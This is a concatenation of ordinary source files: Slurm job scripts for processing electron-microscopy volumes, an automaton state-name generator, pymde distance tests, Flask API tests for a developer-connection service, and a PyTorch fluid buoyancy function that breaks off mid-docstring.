# File: snippets/3DEM/Z_oldscratch/scratch6.py (repo: michielkleinnijenhuis/EM, license: Apache-2.0)
# Note: despite the .py extension this is a bash scratch file of cluster commands.
scriptdir="$HOME/workspace/EM"
# DATA="$HOME/oxdata/P01"
datadir="$DATA/EM/M3/M3_S1_GNU" && cd $datadir
dataset='m000'
refsect='0250'
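# Pick one pf/field pair below (raw stack, Ilastik predictions, or EED-filtered
# probabilities), then build and submit a Slurm job that merges the per-block
# HDF5 files into a single volume.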
pf=; field='stack'
pf=_probs; field='volume/predictions'
pf=_probs0_eed2; field='stack'
qsubfile=$datadir/EM_mb${pf}.sh
echo '#!/bin/bash' > $qsubfile
echo "#SBATCH --nodes=1" >> $qsubfile
echo "#SBATCH --ntasks-per-node=1" >> $qsubfile
echo "#SBATCH --time=02:00:00" >> $qsubfile
echo "#SBATCH --mem=250000" >> $qsubfile
echo "#SBATCH --job-name=EM_mb" >> $qsubfile
echo "python $scriptdir/convert/EM_mergeblocks.py -i \
$datadir/${dataset}_00000-01000_00000-01000_00000-00460${pf}.h5 \
$datadir/${dataset}_01000-02000_00000-01000_00000-00460${pf}.h5 \
$datadir/${dataset}_02000-03000_00000-01000_00000-00460${pf}.h5 \
$datadir/${dataset}_00000-01000_01000-02000_00000-00460${pf}.h5 \
$datadir/${dataset}_01000-02000_01000-02000_00000-00460${pf}.h5 \
$datadir/${dataset}_02000-03000_01000-02000_00000-00460${pf}.h5 \
$datadir/${dataset}_00000-01000_02000-03000_00000-00460${pf}.h5 \
$datadir/${dataset}_01000-02000_02000-03000_00000-00460${pf}.h5 \
$datadir/${dataset}_02000-03000_02000-03000_00000-00460${pf}.h5 \
-o $datadir/${dataset}_00000-03000_00000-03000_00000-00430${pf}.h5 \
-f $field -l 'zyx'" >> $qsubfile
sbatch -p compute $qsubfile
#rsync -avz ndcn0180@arcus.arc.ox.ac.uk:/data/ndcn-fmrib-water-brain/ndcn0180/EM/M3/M3_S1_GNU/m000_00000-03000_?????-?????_?????-?????.h5 /Users/michielk/oxdata/P01/EM/M3/M3_S1_GNU/
scriptdir="$HOME/workspace/EM"
DATA="$HOME/oxdata"
datadir="$DATA/P01/EM/M3/M3_S1_GNU" && cd $datadir
dataset='m000'
pf=;
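# Convert the merged HDF5 volume to NIfTI ('zyx' layout in, 'xyz' out).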
python $scriptdir/convert/EM_stack2stack.py \
"${datadir}/${dataset}_00000-03000_00000-03000_00000-00430.h5" \
"${datadir}/${dataset}_00000-03000_00000-03000_00000-00430.nii.gz" \
-i 'zyx' -l 'xyz' -e -0.0073 -0.0073 0.05 -u
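# Long-running Slurm job: edge-enhancing diffusion (EED) over the full probability volume.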
x=0; X=3000; y=0; Y=3000; z=0; Z=430; layer=1;
qsubfile=$datadir/EM_eed_submit_${x}-${X}_${y}-${Y}_${layer}.sh
echo '#!/bin/bash' > $qsubfile
echo "#SBATCH --nodes=1" >> $qsubfile
echo "#SBATCH --ntasks-per-node=1" >> $qsubfile
echo "#SBATCH --time=100:00:00" >> $qsubfile
echo "#SBATCH --mem=256000" >> $qsubfile
echo "#SBATCH --job-name=EM_eed" >> $qsubfile
echo "$datadir/bin/EM_eed '$datadir' \
'${dataset}_`printf %05d ${x}`-`printf %05d ${X}`_`printf %05d ${y}`-`printf %05d ${Y}`_`printf %05d ${z}`-`printf %05d ${Z}`_probs' \
'/volume/predictions' '/stack' $layer \
> $datadir/${dataset}_`printf %05d ${x}`-`printf %05d ${X}`_`printf %05d ${y}`-`printf %05d ${Y}`_`printf %05d ${z}`-`printf %05d ${Z}`_probs.log &" >> $qsubfile
echo "wait" >> $qsubfile
sbatch -p compute $qsubfile
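# Probability-to-labels (watershed) job over the full volume; job name EM_ws.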
x=0000; X=3000; y=0000; Y=3000; z=0; Z=430; # mem +- 188GB for MA
qsubfile=$datadir/EM_p2l_${x}-${X}.sh
echo '#!/bin/bash' > $qsubfile
echo "#SBATCH --nodes=1" >> $qsubfile
echo "#SBATCH --ntasks-per-node=1" >> $qsubfile
echo "#SBATCH --time=24:00:00" >> $qsubfile
echo "#SBATCH --mem=256000" >> $qsubfile
echo "#SBATCH --job-name=EM_ws" >> $qsubfile
echo "python $scriptdir/mesh/prob2labels.py $datadir $dataset \
--SEfile '_seg.h5' \
-n 5 -o 220 235 491 -s 430 4460 5217 \
-x $x -X $X -y $y -Y $Y -z $z -Z $Z > $datadir/output_${x}-${X}_${y}-${Y} &" >> $qsubfile
echo "wait" >> $qsubfile
sbatch -p compute $qsubfile
sbatch -p devel $qsubfile
--SEfile '_seg.h5' --MAfile '_probs_ws_MAfilled.h5' --MMfile '_probs_ws_MMdistsum_distfilter.h5' --UAfile '_probs_ws_UA.h5' --PAfile '_probs_ws_PA.h5'
scriptdir="$HOME/workspace/EM"
# DATA="$HOME/oxdata/P01"
datadir="$DATA/EM/M3/M3_S1_GNU" && cd $datadir
dataset='m000'
refsect='0250'
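# Rename block files to corrected coordinate ranges: z now starts at 00030, the
# last x block ends at 05217 and the last y block at 04460.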
rename _00000-00460.h5 _00030-00460.h5 ${dataset}_?????-?????_?????-?????_00000-00460.h5
rename m000_05000-06000 m000_05000-05217 ${dataset}_05000-06000_?????-?????_?????-?????.h5
rename _04000-05000_00030-00460.h5 _04000-04460_00030-00460.h5 ${dataset}_?????-?????_04000-05000_?????-?????.h5
rename _00000-00460 _00030-00460 ${dataset}_?????-?????_?????-?????_00000-00460_probs.*
rename m000_05000-06000 m000_05000-05217 ${dataset}_05000-06000_?????-?????_?????-?????_probs.*
rename _04000-05000_00030-00460 _04000-04460_00030-00460 ${dataset}_?????-?????_04000-05000_?????-?????_probs.*
rename _00000-00460 _00030-00460 ${dataset}_?????-?????_?????-?????_00000-00460_probs0_eed2.*
rename m000_05000-06000 m000_05000-05217 ${dataset}_05000-06000_?????-?????_?????-?????_probs0_eed2.*
rename _04000-05000_00030-00460 _04000-04460_00030-00460 ${dataset}_?????-?????_04000-05000_?????-?????_probs0_eed2.*
rename _00000-00460 _00030-00460 m000_*
rename m000_05000-06000 m000_05000-05217 m000_*
rename _04000-05000_00030-00460 _04000-04460_00030-00460 m000_*
pf=; field='stack'
pf=_probs; field='volume/predictions'
pf=_probs0_eed2; field='stack'
qsubfile=$datadir/EM_mb${pf}.sh
echo '#!/bin/bash' > $qsubfile
echo "#SBATCH --nodes=1" >> $qsubfile
echo "#SBATCH --ntasks-per-node=1" >> $qsubfile
echo "#SBATCH --time=02:00:00" >> $qsubfile
#echo "#SBATCH --mem=50000" >> $qsubfile
echo "#SBATCH --job-name=EM_mb" >> $qsubfile
echo "python $scriptdir/convert/EM_mergeblocks.py -i \
$datadir/${dataset}_00000-01000_00000-01000_00030-00460${pf}.h5 \
$datadir/${dataset}_01000-02000_00000-01000_00030-00460${pf}.h5 \
$datadir/${dataset}_02000-03000_00000-01000_00030-00460${pf}.h5 \
$datadir/${dataset}_03000-04000_00000-01000_00030-00460${pf}.h5 \
$datadir/${dataset}_04000-05000_00000-01000_00030-00460${pf}.h5 \
$datadir/${dataset}_05000-05217_00000-01000_00030-00460${pf}.h5 \
$datadir/${dataset}_00000-01000_01000-02000_00030-00460${pf}.h5 \
$datadir/${dataset}_01000-02000_01000-02000_00030-00460${pf}.h5 \
$datadir/${dataset}_02000-03000_01000-02000_00030-00460${pf}.h5 \
$datadir/${dataset}_03000-04000_01000-02000_00030-00460${pf}.h5 \
$datadir/${dataset}_04000-05000_01000-02000_00030-00460${pf}.h5 \
$datadir/${dataset}_05000-05217_01000-02000_00030-00460${pf}.h5 \
$datadir/${dataset}_00000-01000_02000-03000_00030-00460${pf}.h5 \
$datadir/${dataset}_01000-02000_02000-03000_00030-00460${pf}.h5 \
$datadir/${dataset}_02000-03000_02000-03000_00030-00460${pf}.h5 \
$datadir/${dataset}_03000-04000_02000-03000_00030-00460${pf}.h5 \
$datadir/${dataset}_04000-05000_02000-03000_00030-00460${pf}.h5 \
$datadir/${dataset}_05000-05217_02000-03000_00030-00460${pf}.h5 \
$datadir/${dataset}_00000-01000_03000-04000_00030-00460${pf}.h5 \
$datadir/${dataset}_01000-02000_03000-04000_00030-00460${pf}.h5 \
$datadir/${dataset}_02000-03000_03000-04000_00030-00460${pf}.h5 \
$datadir/${dataset}_03000-04000_03000-04000_00030-00460${pf}.h5 \
$datadir/${dataset}_04000-05000_03000-04000_00030-00460${pf}.h5 \
$datadir/${dataset}_05000-05217_03000-04000_00030-00460${pf}.h5 \
$datadir/${dataset}_00000-01000_04000-04460_00030-00460${pf}.h5 \
$datadir/${dataset}_01000-02000_04000-04460_00030-00460${pf}.h5 \
$datadir/${dataset}_02000-03000_04000-04460_00030-00460${pf}.h5 \
$datadir/${dataset}_03000-04000_04000-04460_00030-00460${pf}.h5 \
$datadir/${dataset}_04000-05000_04000-04460_00030-00460${pf}.h5 \
$datadir/${dataset}_05000-05217_04000-04460_00030-00460${pf}.h5 \
-o $datadir/${dataset}_00000-05217_00000-04460_00030-00460${pf}.h5 \
-f $field -l 'zyx'" >> $qsubfile
sbatch -p compute $qsubfile

# File: finenight/python/nameGenerator.py (repo: rmuir/moman, license: MIT)
class IndexNameGenerator:
"""Renaming states with this class is not stable, that is,
it's not sure that renaming the FSA will give allways the
same result.
"""
def __init__(self):
self.index = 0
def generate(self):
name = "q" + str(self.index)
self.index += 1
return name
class PlainIndexNameGenerator:
"""Renaming states with this class is not stable, that is,
it's not sure that renaming the FSA will give allways the
same result.
"""
def __init__(self):
self.index = 0
def generate(self):
name = str(self.index)
self.index += 1
return name
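# Usage sketch (an addition, not part of the original module): each generator
# hands out a fresh name per call, so output depends purely on call order.
if __name__ == "__main__":
    gen = IndexNameGenerator()
    assert gen.generate() == "q0"
    assert gen.generate() == "q1"
    plain = PlainIndexNameGenerator()
    assert plain.generate() == "0"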

# File: pymde/preprocess/test_data_matrix.py (repo: kruus/pymde, license: Apache-2.0)
import numpy as np
import scipy.sparse as sp
import torch
from pymde import preprocess
import pymde.testing as testing
@testing.cpu_and_cuda
def test_all_distances_numpy(device):
del device
np.random.seed(0)
data_matrix = np.random.randn(4, 2)
graph = preprocess.data_matrix.distances(data_matrix)
assert graph.n_items == data_matrix.shape[0]
assert graph.n_edges == 6
testing.assert_all_equal(
graph.edges,
torch.tensor([[0, 1], [0, 2], [0, 3], [1, 2], [1, 3], [2, 3]]),
)
for e, d in zip(graph.edges, graph.distances):
e = e.cpu().numpy()
d = d.item()
true_distance = np.linalg.norm(data_matrix[e[0]] - data_matrix[e[1]])
testing.assert_allclose(true_distance, d)
@testing.cpu_and_cuda
def test_all_distances_torch(device):
np.random.seed(0)
data_matrix = torch.tensor(
np.random.randn(4, 2), dtype=torch.float, device=device
)
graph = preprocess.data_matrix.distances(data_matrix)
assert graph.n_items == data_matrix.shape[0]
assert graph.n_edges == 6
testing.assert_all_equal(
graph.edges,
torch.tensor([[0, 1], [0, 2], [0, 3], [1, 2], [1, 3], [2, 3]]),
)
for e, d in zip(graph.edges, graph.distances):
true_distance = (data_matrix[e[0]] - data_matrix[e[1]]).norm()
testing.assert_allclose(true_distance, d)
@testing.cpu_and_cuda
def test_all_distances_sparse(device):
del device
np.random.seed(0)
data_matrix = sp.csr_matrix(np.random.randn(4, 2))
graph = preprocess.data_matrix.distances(data_matrix)
data_matrix = data_matrix.todense()
assert graph.n_items == data_matrix.shape[0]
assert graph.n_edges == 6
testing.assert_all_equal(
graph.edges,
torch.tensor([[0, 1], [0, 2], [0, 3], [1, 2], [1, 3], [2, 3]]),
)
for e, d in zip(graph.edges, graph.distances):
e = e.cpu().numpy()
d = d.item()
true_distance = np.linalg.norm(data_matrix[e[0]] - data_matrix[e[1]])
testing.assert_allclose(true_distance, d)
@testing.cpu_and_cuda
def test_some_distances_numpy(device):
del device
np.random.seed(0)
max_distances = 50
retain_fraction = max_distances / int(500 * (499) / 2)
data_matrix = np.random.randn(500, 2)
graph = preprocess.data_matrix.distances(
data_matrix, retain_fraction=retain_fraction
)
assert graph.n_items == data_matrix.shape[0]
assert graph.n_edges == max_distances
for e, d in zip(graph.edges, graph.distances):
e = e.cpu().numpy()
d = d.item()
true_distance = np.linalg.norm(data_matrix[e[0]] - data_matrix[e[1]])
testing.assert_allclose(true_distance, d)
@testing.cpu_and_cuda
def test_some_distances_torch(device):
np.random.seed(0)
max_distances = 50
retain_fraction = max_distances / int(500 * (499) / 2)
data_matrix = torch.tensor(
np.random.randn(500, 2), dtype=torch.float, device=device
)
graph = preprocess.data_matrix.distances(
data_matrix, retain_fraction=retain_fraction
)
data_matrix = data_matrix.cpu().numpy()
assert graph.n_items == data_matrix.shape[0]
assert graph.n_edges == max_distances
for e, d in zip(graph.edges, graph.distances):
e = e.cpu().numpy()
d = d.item()
true_distance = np.linalg.norm(data_matrix[e[0]] - data_matrix[e[1]])
testing.assert_allclose(true_distance, d)
@testing.cpu_and_cuda
def test_some_distances_sparse(device):
del device
np.random.seed(0)
max_distances = 50
retain_fraction = max_distances / int(500 * (499) / 2)
data_matrix = sp.csr_matrix(np.random.randn(500, 2))
graph = preprocess.data_matrix.distances(
data_matrix, retain_fraction=retain_fraction
)
data_matrix = data_matrix.todense()
assert graph.n_items == data_matrix.shape[0]
assert graph.n_edges == max_distances
for e, d in zip(graph.edges, graph.distances):
e = e.cpu().numpy()
d = d.item()
true_distance = np.linalg.norm(data_matrix[e[0]] - data_matrix[e[1]])
testing.assert_allclose(true_distance, d)
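# Illustrative usage sketch (an addition, not part of the original test suite),
# restating what the tests above verify: `distances` returns a graph whose edges
# index row pairs of the input and whose distances are the Euclidean norms; with
# 4 items, all 4 * 3 / 2 = 6 pairs are kept by default.
if __name__ == "__main__":
    demo_matrix = np.random.randn(4, 2)
    demo_graph = preprocess.data_matrix.distances(demo_matrix)
    print(demo_graph.n_items, demo_graph.n_edges)  # expected: 4 6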

# File: tests/test_service_api.py (repo: danertor/devsocial, license: MIT)
# pylint: disable=missing-module-docstring, missing-class-docstring, missing-function-docstring
# pylint: disable=unused-variable, unused-argument, too-few-public-methods, unused-import, no-self-use
import pytest
from flask.testing import FlaskClient
from devsocial.config import get_os_var
from devsocial.dbmodels import db, migrate
from devsocial.exceptions import InvalidHandleError
from devsocial.service.app import app
from devsocial.service.v1.routes import dev_social_api
from devsocial.service.v1.handlers import register
import devsocial.service.routes
from devsocial.github.models import GitHubDeveloper, GitHubOrganisation
from devsocial.twitter.models import TwitterDeveloper
# pylint: disable=redefined-outer-name
from tests.utils import remove_registered_at
@pytest.fixture(scope='module')
def client():
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite://"
app.config["DEBUG"] = get_os_var('FLASK_DEBUG', default='False', mandatory=False) == 'True'
app.config["Development"] = app.config["DEBUG"]
app.config["LOG_LEVEL"] = "DEBUG" if app.config["DEBUG"] else 'ERROR'
app.register_blueprint(dev_social_api, url_prefix='/')
with app.test_client() as client:
with app.app_context():
db.init_app(app)
migrate.init_app(app, db)
yield client
SERVICE_API_PORT = '8080'
SERVICE_API_HOST = 'localhost'
# pylint: disable=invalid-name
class TestRealtimeApi:
    realtime_endpoint = f"http://{SERVICE_API_HOST}:{SERVICE_API_PORT}"
realtime_uri = "connected/realtime/{}/{}"
registered_at = "2022-01-25T17:55:10Z"
# Two connected developers
dev1_handle = 'homer'
dev2_handle = 'lenny'
dev1_twitter_id = '1'
dev2_twitter_id = '2'
twitter_dev1: TwitterDeveloper = TwitterDeveloper(dev1_handle, id=dev1_twitter_id)
twitter_dev2: TwitterDeveloper = TwitterDeveloper(dev2_handle, id=dev2_twitter_id)
twitter_dev1.followers.append(twitter_dev2.id)
twitter_dev2.followers.append(twitter_dev1.id)
organisation_name_connected = "Nuclear Plant"
organisation = GitHubOrganisation(organisation_name_connected)
github_dev1: GitHubDeveloper = GitHubDeveloper(dev1_handle)
github_dev1.organisations.append(organisation)
github_dev2: GitHubDeveloper = GitHubDeveloper(dev2_handle)
github_dev2.organisations.append(organisation)
twitter_devs_connected = [twitter_dev1, twitter_dev2]
github_devs_connected = [github_dev1, github_dev2]
twitter_devs_connected_iter = (i for i in range(len(twitter_devs_connected)))
github_devs_connected_iter = (i for i in range(len(github_devs_connected)))
# Two not fully connected developers
dev3_handle = 'krasty'
dev4_handle = 'bart'
dev3_twitter_id = '3'
dev4_twitter_id = '4'
twitter_dev3: TwitterDeveloper = TwitterDeveloper(dev3_handle, id=dev3_twitter_id)
twitter_dev4: TwitterDeveloper = TwitterDeveloper(dev4_handle, id=dev4_twitter_id)
twitter_dev3.followers.append(twitter_dev4.id)
organisation_name_dev3 = "TV Show"
organisation = GitHubOrganisation(organisation_name_connected)
github_dev3: GitHubDeveloper = GitHubDeveloper(dev3_handle)
github_dev3.organisations.append(organisation)
github_dev4: GitHubDeveloper = GitHubDeveloper(dev4_handle)
twitter_devs_not_connected = [twitter_dev3, twitter_dev4]
github_devs_not_connected = [github_dev3, github_dev4]
twitter_devs_not_connected_iter = (i for i in range(len(twitter_devs_not_connected)))
github_devs_not_connected_iter = (i for i in range(len(github_devs_not_connected)))
def mock_twitter_get_user_connected(self, *ignored_arg):
try:
idx = next(self.twitter_devs_connected_iter)
except StopIteration as _:
self.twitter_devs_connected_iter = (i for i in range(len(self.twitter_devs_connected)))
idx = next(self.twitter_devs_connected_iter)
return self.twitter_devs_connected[idx]
def mock_github_user_user_connected(self, *ignored_arg):
try:
idx = next(self.github_devs_connected_iter)
except StopIteration as _:
self.github_devs_connected_iter = (i for i in range(len(self.github_devs_connected)))
idx = next(self.github_devs_connected_iter)
return self.github_devs_connected[idx]
def mock_twitter_get_user_not_connected(self, *ignored_arg):
try:
idx = next(self.twitter_devs_not_connected_iter)
except StopIteration as _:
self.twitter_devs_not_connected_iter = (i for i in range(len(self.twitter_devs_not_connected)))
idx = next(self.twitter_devs_not_connected_iter)
return self.twitter_devs_not_connected[idx]
def mock_github_user_user_not_connected(self, *ignored_arg):
try:
idx = next(self.github_devs_not_connected_iter)
except StopIteration as _:
self.github_devs_not_connected_iter = (i for i in range(len(self.github_devs_not_connected)))
idx = next(self.github_devs_not_connected_iter)
return self.github_devs_not_connected[idx]
    def mock_twitter_get_user_not_found(self, handle, *ignored_arg):
        raise InvalidHandleError(f"{handle} is not a valid user in twitter")
    def mock_github_get_user_not_found(self, handle, *ignored_arg):
        raise InvalidHandleError(f"{handle} is not a valid user in github")
def test_realtime_response_200_ok_connected(self, monkeypatch, client: FlaskClient):
expected_response = {'connected': True, 'organisations': [self.organisation_name_connected]}
with monkeypatch.context() as mp:
mp.setattr(devsocial.service.v1.social_net.twitter_connector,
"get_user", self.mock_twitter_get_user_connected)
mp.setattr(devsocial.service.v1.social_net.github_connector,
"get_user", self.mock_github_user_user_connected)
response = client.get(self.realtime_uri.format(self.dev1_handle, self.dev2_handle))
assert response.status_code == 200
assert response.json == expected_response
def test_realtime_response_200_ok_not_connected(self, monkeypatch, client: FlaskClient):
expected_response = {'connected': False}
with monkeypatch.context() as mp:
mp.setattr(devsocial.service.v1.social_net.twitter_connector,
"get_user", self.mock_twitter_get_user_not_connected)
mp.setattr(devsocial.service.v1.social_net.github_connector,
"get_user", self.mock_github_user_user_not_connected)
response = client.get(self.realtime_uri.format(self.dev3_handle, self.dev4_handle))
assert response.status_code == 200
assert response.json == expected_response
def test_realtime_response_400_bad_same_handle(self, monkeypatch, client: FlaskClient):
expected_response = {'errors': ["'handle1' and 'handle2' have the same value", ]}
with monkeypatch.context() as mp:
mp.setattr(devsocial.service.v1.social_net.twitter_connector,
"get_user", self.mock_twitter_get_user_connected)
mp.setattr(devsocial.service.v1.social_net.github_connector,
"get_user", self.mock_github_user_user_connected)
response = client.get(self.realtime_uri.format(self.dev1_handle, self.dev1_handle))
assert response.status_code == 400
assert response.json == expected_response
def test_realtime_response_404_handle_not_found(self, monkeypatch, client: FlaskClient):
        expected_response = {'errors': [f"{self.dev1_handle} is not a valid user in github",
                                        f"{self.dev1_handle} is not a valid user in twitter",
                                        f"{self.dev2_handle} is not a valid user in github",
                                        f"{self.dev2_handle} is not a valid user in twitter"]}
with monkeypatch.context() as mp:
mp.setattr(devsocial.service.v1.social_net.twitter_connector,
"get_user", self.mock_twitter_get_user_not_found)
mp.setattr(devsocial.service.v1.social_net.github_connector,
"get_user", self.mock_github_get_user_not_found)
response = client.get(self.realtime_uri.format(self.dev1_handle, self.dev2_handle))
assert response.status_code == 404
assert response.json == expected_response
# pylint: disable=invalid-name
class TestRegisterApi:
    realtime_endpoint = f"http://{SERVICE_API_HOST}:{SERVICE_API_PORT}"
realtime_uri = "connected/realtime/{}/{}"
registered_at = "2022-01-25T17:55:10Z"
# Two connected developers
dev1_handle = 'homer'
dev2_handle = 'lenny'
dev1_twitter_id = '1'
dev2_twitter_id = '2'
twitter_dev1: TwitterDeveloper = TwitterDeveloper(dev1_handle, id=dev1_twitter_id)
twitter_dev2: TwitterDeveloper = TwitterDeveloper(dev2_handle, id=dev2_twitter_id)
twitter_dev1.followers.append(twitter_dev2.id)
twitter_dev2.followers.append(twitter_dev1.id)
organisation_name_connected = "Nuclear Plant"
organisation = GitHubOrganisation(organisation_name_connected)
github_dev1: GitHubDeveloper = GitHubDeveloper(dev1_handle)
github_dev1.organisations.append(organisation)
github_dev2: GitHubDeveloper = GitHubDeveloper(dev2_handle)
github_dev2.organisations.append(organisation)
twitter_devs_connected = [twitter_dev1, twitter_dev2]
github_devs_connected = [github_dev1, github_dev2]
twitter_devs_connected_iter = (i for i in range(len(twitter_devs_connected)))
github_devs_connected_iter = (i for i in range(len(github_devs_connected)))
# Two not fully connected developers
dev3_handle = 'krasty'
dev4_handle = 'bart'
dev3_twitter_id = '3'
dev4_twitter_id = '4'
twitter_dev3: TwitterDeveloper = TwitterDeveloper(dev3_handle, id=dev3_twitter_id)
twitter_dev4: TwitterDeveloper = TwitterDeveloper(dev4_handle, id=dev4_twitter_id)
twitter_dev3.followers.append(twitter_dev4.id)
organisation_name_dev3 = "TV Show"
organisation = GitHubOrganisation(organisation_name_connected)
github_dev3: GitHubDeveloper = GitHubDeveloper(dev3_handle)
github_dev3.organisations.append(organisation)
github_dev4: GitHubDeveloper = GitHubDeveloper(dev4_handle)
twitter_devs_not_connected = [twitter_dev3, twitter_dev4]
github_devs_not_connected = [github_dev3, github_dev4]
twitter_devs_not_connected_iter = (i for i in range(len(twitter_devs_not_connected)))
github_devs_not_connected_iter = (i for i in range(len(github_devs_not_connected)))
@pytest.fixture(scope='function')
def reset_db(self):
db.drop_all()
db.create_all()
def mock_twitter_get_user_connected(self, *ignored_arg):
try:
idx = next(self.twitter_devs_connected_iter)
except StopIteration as _:
self.twitter_devs_connected_iter = (i for i in range(len(self.twitter_devs_connected)))
idx = next(self.twitter_devs_connected_iter)
return self.twitter_devs_connected[idx]
def mock_github_user_user_connected(self, *ignored_arg):
try:
idx = next(self.github_devs_connected_iter)
except StopIteration as _:
self.github_devs_connected_iter = (i for i in range(len(self.github_devs_connected)))
idx = next(self.github_devs_connected_iter)
return self.github_devs_connected[idx]
def mock_twitter_get_user_not_connected(self, *ignored_arg):
try:
idx = next(self.twitter_devs_not_connected_iter)
except StopIteration as _:
self.twitter_devs_not_connected_iter = (i for i in range(len(self.twitter_devs_not_connected)))
idx = next(self.twitter_devs_not_connected_iter)
return self.twitter_devs_not_connected[idx]
def mock_github_user_user_not_connected(self, *ignored_arg):
try:
idx = next(self.github_devs_not_connected_iter)
except StopIteration as _:
self.github_devs_not_connected_iter = (i for i in range(len(self.github_devs_not_connected)))
idx = next(self.github_devs_not_connected_iter)
return self.github_devs_not_connected[idx]
    def mock_twitter_get_user_not_found(self, handle, *ignored_arg):
        raise InvalidHandleError(f"{handle} is not a valid user in twitter")
    def mock_github_get_user_not_found(self, handle, *ignored_arg):
        raise InvalidHandleError(f"{handle} is not a valid user in github")
def test_register_response_200_ok_connected(self, monkeypatch, client: FlaskClient, reset_db: None):
expected_response = [{'connected': True,
'organisations': ['Nuclear Plant'],
'registered_at': '2022-02-06T13:18:37Z'}]
with monkeypatch.context() as mp:
mp.setattr(devsocial.service.v1.social_net.twitter_connector,
"get_user", self.mock_twitter_get_user_connected)
mp.setattr(devsocial.service.v1.social_net.github_connector,
"get_user", self.mock_github_user_user_connected)
_ = client.get(self.realtime_uri.format(self.dev1_handle, self.dev2_handle))
response = register(self.dev1_handle, self.dev2_handle)
response_cleaned = remove_registered_at(response.json)
expected_response_cleaned = remove_registered_at(expected_response)
assert response.status_code == 200
assert response_cleaned == expected_response_cleaned
def test_realtime_response_200_ok_not_connected(self, monkeypatch, client: FlaskClient):
expected_response = [{'connected': False, 'registered_at': '2022-02-06T13:18:37Z'}]
with monkeypatch.context() as mp:
mp.setattr(devsocial.service.v1.social_net.twitter_connector,
"get_user", self.mock_twitter_get_user_not_connected)
mp.setattr(devsocial.service.v1.social_net.github_connector,
"get_user", self.mock_github_user_user_not_connected)
_ = client.get(self.realtime_uri.format(self.dev3_handle, self.dev4_handle))
response = register(self.dev3_handle, self.dev4_handle)
response_cleaned = remove_registered_at(response.json)
expected_response_cleaned = remove_registered_at(expected_response)
assert response.status_code == 200
assert response_cleaned == expected_response_cleaned
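# Hypothetical sketch of tests.utils.remove_registered_at (the real helper is not
# shown in this section); judging from its use above, it plausibly drops the
# 'registered_at' timestamp so payloads compare equal regardless of when the
# connection was registered. This is an assumption, not the actual implementation.
def _remove_registered_at_sketch(items):
    return [{k: v for k, v in item.items() if k != "registered_at"} for item in items]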

# File: neural_models/architectures/old_fnet/source_terms.py (repo: ajupatatero/neurasim, license: MIT)
import torch
from . import CellType
from . import getDx
def addBuoyancy(U, flags, density, gravity, rho_star, dt):
r"""Add buoyancy force.
Arguments:
        U (Tensor): velocity field (size(1) can be 2 or 3, indicating 2D / 3D)
flags (Tensor): input occupancy grid.
density (Tensor): scalar density grid.
gravity (Tensor): 3D vector indicating direction of gravity.
dt (float): scalar timestep.
Output:
U (Tensor): Output velocity
"""
cuda = torch.device('cuda')
# Argument check
assert U.dim() == 5 and flags.dim() == 5 and density.dim() == 5,\
"Dimension mismatch"
assert flags.size(1) == 1, "flags is not scalar"
bsz = flags.size(0)
d = flags.size(2)
h = flags.size(3)
w = flags.size(4)
is3D = (U.size(1) == 3)
bnd = 1
if not is3D:
assert d == 1, "2D velocity field but zdepth > 1"
assert U.size(1) == 2, "2D velocity field must have only 2 channels"
assert U.size(0) == bsz and U.size(2) == d and \
U.size(3) == h and U.size(4) == w, "Size mismatch"
assert density.is_same_size(flags), "Size mismatch"
assert U.is_contiguous() and flags.is_contiguous() and \
density.is_contiguous(), "Input is not contiguous"
assert gravity.dim() == 1 and gravity.size(0) == 3, \
"Gravity must be a 3D vector (even in 2D)"
# (aalgua) I don't know why Manta divides by dx, as in all other modules
# dx = 1.
strength = gravity * dt
i = torch.arange(0, w, dtype=torch.long, device=cuda).view(1,w).expand(bsz, d, h, w)
j = torch.arange(0, h, dtype=torch.long, device=cuda).view(1,h,1).expand(bsz, d, h, w)
k = torch.zeros_like(i)
if (is3D):
k = torch.arange(0, d, dtype=torch.long, device=cuda).view(1,d,1,1).expand(bsz, d, h, w)
zero = torch.zeros_like(i)
zeroBy = torch.zeros(i.size(), dtype=torch.uint8, device=cuda)
zero_f = zero.cuda().float()
idx_b = torch.arange(start=0, end=bsz, dtype=torch.long, device=cuda) \
.view(bsz, 1, 1, 1).expand(bsz,d,h,w)
maskBorder = (i < bnd).__or__\
(i > w - 1 - bnd).__or__\
(j < bnd).__or__\
(j > h - 1 - bnd)
if (is3D):
maskBorder = maskBorder.__or__(k < bnd).__or__\
(k > d - 1 - bnd)
maskBorder = maskBorder.unsqueeze(1)
# No buoyancy on the border. Set continue (mCont) to false.
mCont = torch.ones_like(zeroBy).unsqueeze(1)
mCont.masked_fill_(maskBorder, 0)
isFluid = flags.eq(CellType.TypeFluid).__and__(mCont)
mCont.masked_fill_(isFluid.ne(1), 0)
mCont.squeeze_(1)
max_X = torch.zeros_like(zero).fill_(w-1)
max_Y = torch.zeros_like(zero).fill_(h-1)
i_l = zero.where( (i <= 0), i-1)
i_r = max_X.where( (i > w-2), i+1)
j_l = zero.where( (j <= 0), j-1)
j_r = max_Y.where( (j > h-2), j+1)
fluid100 = flags[idx_b, zero, k, j, i_l].eq(CellType.TypeFluid).__and__ \
(mCont)
#(flags[idx_b, zero, k, j, i_r].eq(CellType.TypeFluid)).__and__ \
factor = strength[0] * ((0.5* \
(density[idx_b, zero, k, j, i] +
density[idx_b, zero, k, j, i_l] ) - rho_star))
U[:,0].masked_scatter_(fluid100, (U.select(1,0) + factor).masked_select(fluid100))
fluid010 = flags[idx_b, zero, k, j_l, i].eq(CellType.TypeFluid).__and__ \
(mCont)
#(flags[idx_b, zero, k, j_r, i].eq(CellType.TypeFluid)).__and__ \
#fluid010 = zeroBy.where( j <= 0, (flags[idx_b, zero, k, j-1, i].eq(CellType.TypeFluid))).__and__(mCont)
factor = strength[1] * ((0.5* \
((density[idx_b, zero, k, j, i] +
density[idx_b, zero, k, j_l, i] ) )- rho_star))
#factor = strength[1] * (density.squeeze(1) - \
# zero_f.where( j <= 0, density[idx_b, zero, k, j-1, i]) )
U[:,1].masked_scatter_(fluid010, (U.select(1,1) + factor).masked_select(fluid010))
if (is3D):
        fluid001 = zeroBy.where( k <= 0, (flags[idx_b, zero, k-1, j, i].eq(CellType.TypeFluid))).__and__(mCont)
factor = strength[2] *(0.5* (density.squeeze(1) + \
zero_f.where(k <= 1, density[idx_b, zero, k-1, j, i]) ))
U[:,2].masked_scatter_(fluid001, (U.select(1,2) + factor).masked_select(fluid001))
return U
# *****************************************************************************
# addNew_SourceTerm
# *****************************************************************************
def addBuoyancy_NewSourceTerm(U, flags, density, gravity, rho_star, dt):
r"""Add buoyancy force.
Arguments:
